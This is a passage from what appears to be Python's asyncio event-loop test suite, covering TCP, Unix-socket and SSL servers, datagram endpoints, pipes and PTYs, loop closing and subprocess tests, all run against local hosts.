self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
        self.check_ssl_extra_info(client, peername=(host, port),
                                  peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
        assert False, 'Cannot create socket.'
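        # Note: the for/else above only reaches the assert when no address
        # family produced a usable socket, i.e. the loop never hit 'break'.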
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms the selector
        # may sleep a little less than the timeout, depending on the resolution
        # of the clock used by the kernel. Tolerate a few extra calls on
        # these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
